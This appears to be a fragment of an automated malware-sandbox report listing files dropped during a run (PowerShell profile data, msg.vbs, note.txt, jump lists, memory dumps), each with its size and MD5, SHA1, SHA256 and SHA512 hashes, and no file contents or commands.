1d16f4e4a243bc62f91dfd7cee47fef9618cf2eb

SHA256
13f6be85dd43eda22a81e91db2a490f505061e92871b517e9846e97e162ae121

SHA512
a7d3b2e7504523667825e630049f7a5a9e6c8199ab2437d5c28bdf2f7b97a45d15761f3e3ce0afe945a388b344cef52e76d84d6656acf73098ed3598ce93b60b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
827875a4a686746dc3d2e3eb8f3e2c56

SHA1
9eef8c43ffea7281365d67b8ba435ee13affd427

SHA256
ae1eea5b486c83db8c4ce2332183712b6b0a63c6a5d8917a9f17e91e7f2a3806

SHA512
ac5f537f6ccc97b0f6484a16824c869907bc20993335985292569e5cb73ef13bd5804f6bc8500e906f7a1066d1bc37a014712e9da11a7796257534775c7c5a6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
a5ace5b1e1392854c698257bee4f3e7a

SHA1
47aed60a3a2fc5157dd62b0849a411f616fb3072

SHA256
c99619b5acdc7217bbd262106129ea1661b531c2890476300771b706477d9734

SHA512
ed15a10ff08892d8a49b04c3b208016be3f416813ed233e30c2d41ceb0720b5c987101fa4dee8d5adafcfb823784c40011f1c1aba141110f3a7a5a276e14144e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
3c7ede87e259562b06b633aafd180164

SHA1
b292673ea6d8439b360a8558c3fbca3957db3b2e

SHA256
cf0241f1a68cd89ea2098a638d262ccd1d347b033a63371325dbf82e2c74dcde

SHA512
5c841e366fc16d53c7ef12fff2d007fe1bae3a8e0a6a2a44f2ea192281c132e57e34c4319a7c3cafada1c28e8117b0a3a55ac385be7d8e252d23cf0a7fb60065

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
effddbda8509125f47e5a754c218fc20

SHA1
759d1bebf0099e54ffe6ddd6f5dd2c682a51646f

SHA256
473079088f98bf990b6977d9ef78b9304bc0c1e1c326a497657ff5adfb089ec6

SHA512
4ad1ba45d95cd4de371a7a273d89a706b0cda9a521a7aaacc422a6ed2b4f66ed5a279b67699bd1ae7cfc8c523755b154db8486571348e734578358ef0c559e91

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
85eb515a79f9dcf83eb7d13b96ede393

SHA1
ccc50d56367ff054a2fe0e9d178f3d05ac8876c9

SHA256
1eefc4cf7ffd11daa0852534c2478bbe398714917878c309e7f1e215b23508b7

SHA512
e9fde0286b41240c967f6e573a0d18ac031440d6f22dac83ff90c592e0296104fc091eccf8eb6a76ece95ad31340c58d429013fb2102c10eee206a823076ee1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
185139bdfcae6d75910b82b1ba1f70b5

SHA1
484b9f22e0e29f757f0d2936a40565e1fffa52c7

SHA256
0b945a6cf423cb5f075b390abaaece111788224522e3215b2234f856be5d6da6

SHA512
80f92228b15c2f44e6c0dc14981cfac7336fe956bff905458e7d6b7920b662e2787e96e3df3008ce6e92abbf1aa22a04c73c3f41c25198c7cc748b29c5b3d64b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
83540136651316e73216efa218ca8caf

SHA1
90725a1b519c926a4ce6a1800ebd44f321ea9b89

SHA256
ebf0e6c62bddd311e9eac383594bc0a21b17a9a2328ddf5617bbfbd648cf7eb1

SHA512
a005670584b5c566a6aceb07a40a3fbcf1f12d303d7e1c585a06ccc99f2463482ead13f62acd1015debbb76009b5bf5f663ab6aeb99eaa064d316164a60912b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
bed76c693a85593331422c025dec0375

SHA1
6cc9e17c29df42b09a8fe20eaced4c4ec8e78f3b

SHA256
99b2abf2ca372e58e3faf47cd719e48f3537bf82b0b0dd2435a65d19fbdc6cda

SHA512
d4d1fa36ac16a57cf25848d6c5767c974017c119e2fefc74ef6579ea244aeca95d8ec125bba549daf0074db774ec3e499d1ab2d6dc78c93719ac1ec0dd3bf538

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
01d45197c75e73b33ac87cdd2faf1b33

SHA1
6479e4f517fcef7a2b93bb789eb97f0478b32174

SHA256
d25838e1c2079f4b71b866ab494b2562bf4a955d3bf033e1d9c4d2c625eeb842

SHA512
9542f727b44949a8fc68010d45e6a6de70f16ca412765a36e9c70420af9dd152d210be567b63fd1f2e3c5ff8100ad224462184a3e07fe2a3061ed78d1509cecf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
55bbb627cac448c7315973ccdade6cab

SHA1
7357227a8441d5e5a9d7055d78d5637e9836fefa

SHA256
c447816db6062535833b4ce7b6b08f0774bd1af917bde5130fed79be60ed844a

SHA512
3bdab14b17b7f6813534667f8f54714ea592fbafcfb7c1bd6dfff4d2867bb6aa1e76bec884ba81670cced4e517547ab0c3dad57846e3891b5f4f6f44d4880322

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
ca885ce2b7a4be34acd565a65ea19984

SHA1
8c5d9a4507aab2ef743cd08cee8d0dff7a43bb99

SHA256
c22434ffab6b0df6d60e3f56e0f87e550abd72566622de3d7458ba027ed7378c

SHA512
1cba207f47a009cbc0fdf2a6cf13ef8215e7b28c7d0912006238db9c91dc23c0528e3ba87e02bddc6c7588b346954d4f9bbf426d80159d163318a8b63cc5cebe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
e339c0ad3aca4c33b09c7c76ed797a15

SHA1
774102d11041d48de215821b67686774605ae7c8

SHA256
2a0aba6fbf082818826c0ccb8664909831bb8f9e79b92cc2a1b4c08c4932d04d

SHA512
13e14f7de043df47570d8472666037180137a6afcb7b89e3b3164d60be7f322abce69dd5fbb3e203e01d0e23ffe77274358915d646323bb18b4d64520e69ec46

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133689604498717756.txt

Filesize
75KB

MD5
4a8d9f2ac0097fbf3981eefb5abced2a

SHA1
99f6585bbaa4fb6ddb5f0fe05e0bb7e1aeaf4a41

SHA256
f66f46f00e945da5df3f2229bbc536fa24763b6a6283d5de88cc88e77fb0824f

SHA512
8a0358ff092de3615b45331423a6d3158df9b4216b6fdd5be37071464ef02ad4c17f3df1bb7344f56de225b9f398b6f5930b76ee7b627c98839e60f7c0529829

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_asg2nhxl.uoh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg.vbs

Filesize
21B

MD5
47e842ce84d617b378e86d4af78baf5c

SHA1
38be9828aa5b485b560431348fbe2b2c6063f40c

SHA256
5dd0174fa7779bcd76d89f73f6d091a3fcb1866e09291f1394c22194939669c3

SHA512
c4513bf9e5ce559fba0a5900836b17acd4804b13afe54df0842c42ed25feb61bdfabeab18e520e21878e9a6773b19b5a1ba2464e159507990cb5016d7a49afe3

Download Submit
C:\Users\Admin\AppData\Local\Temp\note.txt

Filesize
78B

MD5
f43a064ff5e8089214dd393bd99ff6fc

SHA1
31e2b291ecd73f84b5ae3f24749f10da27fef612

SHA256
54d4a587f44c55e37c574998a065b9f8b5ff2f975220e3d3ab7c93ff80b55786

SHA512
2af9e90e68fe6d84ab565f9b6a6e41a2292501c1eed90cb48f0d3d07787f34581d701382afd204057a85b80557807542717fc0a4e1a14c8507f83e86ccb03769

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
69dfe06d19232b4bbcbf4f52467ed75e

SHA1
ec634a73950f5f6f7af5533f906effe1b93431ba

SHA256
e66fcf64589f978924bcdbe84b7deb544636d5b08e98b05eb33b6855cfbaeb9a

SHA512
94e758b1afcca526d0b79060b538a605fb666f81b9ff1d1b92e213796d816e883dfd45487bd4ec3af6719d27b33ebe000e57dd93816c420f47fb681ce2769fa9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
c732f6aed4302e4ce7f8d3bb225cd054

SHA1
2a58cc090cd7fac31417cd05da413210cc375130

SHA256
13aa9122202b91378ab838860a49f1c9b4c54dfaefebcd187e9c49b64dfed2dc

SHA512
2e2652ba4020261b8eaa9301dc96d7fe990993744de2a71cdf208e3d912ebeac21ecf71387bfda0664da8b7b61c0ffd0cf3efbee28a494a6ebb1b316fbc8d051

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
6568f9b790f04fb90766c0830d2ceb5a

SHA1
0fd6166e6f72b6fa76128ce012a0b2ed07f2422c

SHA256
4f6224a466e5355e12da290db51c39555fda8f826453ac2e54542f3c8d89ea11

SHA512
30638d8aee719e2039ad237902526a80a7ab0437a6a2c88de4b56c8f94d4b3fdb58ffb51ece347be25dcebdd447bd5395f1b5d9486a06c46d6ffafe506866863

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
54a7108a79c8fe698e1b03da73604e8c

SHA1
cf078f52647bdc2ec7a0fbc507834adbfe70d061

SHA256
de6b4433906303ec7bf23ba44bf6eb5ef08341ba66991365198522ac4f18240e

SHA512
93e353140b9ed3a95184309621b95637dd10fd1213257a67b98e8b26e4829e6af9d0e2390ed07cc09a70468739ee077ebd1aa8b31866079ab645d4d802d3cbc2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
c0d8a973328c8c7bfc44f075f3a2c6b9

SHA1
0238bd3978cd29f5b3167851be060117ad7bf2c8

SHA256
2455ed8aea21332f34f55325b905ac73813abc25094eefa60c0a491c97262853

SHA512
3b17d66759867c4b993e4f5cdf1e2574ba36d03a3d324060f5cfa1a70a4a784df7c9e58eb0e56de32c1c8a145d61d75b404b06abbf1e374b66267a11870cce3b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
f85f5f6504fd4591095f9189737b975f

SHA1
33112089779c0bf2f7b7b9829a4f30681b8d6728

SHA256
5a2b10b8e96e57b1a44a4050dc87479c68e3846426fc61388355d10991b498bb

SHA512
c7502766bcdbc07dfe1bba0a39d5d96dc01ccc3d37a7b8e7a4d6c4b29c340e4448aa930f77bd1b8fbc740be92e8fd6d0db68d224ba59d35822b4bad72ba9e81b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
37a08eae70b4f465e61d20bdb5ec419e

SHA1
43873c1f4e0f6a5fbba5d83b0a822c9f57f04677

SHA256
05b5130a23049d1be9bc9d63ca398943f9a44a202b7626d8e0e455ec80ead193

SHA512
c6882fc8c90bfdbe43bbe65b7c6ce874f328bfc745d82ced5cba1d621b4b3e0c9304eec6d17879208c0bada8cf8e0e97e11cde17d807fa0b1ce9fbc2305096ec

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
90909975ff0f41a03e65e293d329236b

SHA1
a3744cf91ae9cc8e33bb2d67eba9e5a6d45ca0b3

SHA256
209fc6f071a37d3f7cce913ecb3dc57574fefc7ffa753542afea4438ed545791

SHA512
12f4b0b7b62f824768ee36a85904066291d3209860feb33b43577420c9dfb7ff03a161035e04ceacc5d4cac3184c7b9fb1478e0f93b4cdb4b88cc93b1cd87d6d

Download Submit
memory/1076-19-0x0000022E50D20000-0x0000022E50D42000-memory.dmp

Filesize
136KB

Download
memory/4996-312-0x00000268B9D50000-0x00000268B9E50000-memory.dmp

Filesize
1024KB

Download
memory/4996-349-0x00000268BB200000-0x00000268BB220000-memory.dmp

Filesize
128KB

Download
memory/4996-350-0x00000268BB240000-0x00000268BB260000-memory.dmp

Filesize
128KB

Download
memory/4996-317-0x00000268BAEF0000-0x00000268BAF10000-memory.dmp

Filesize
128KB

Download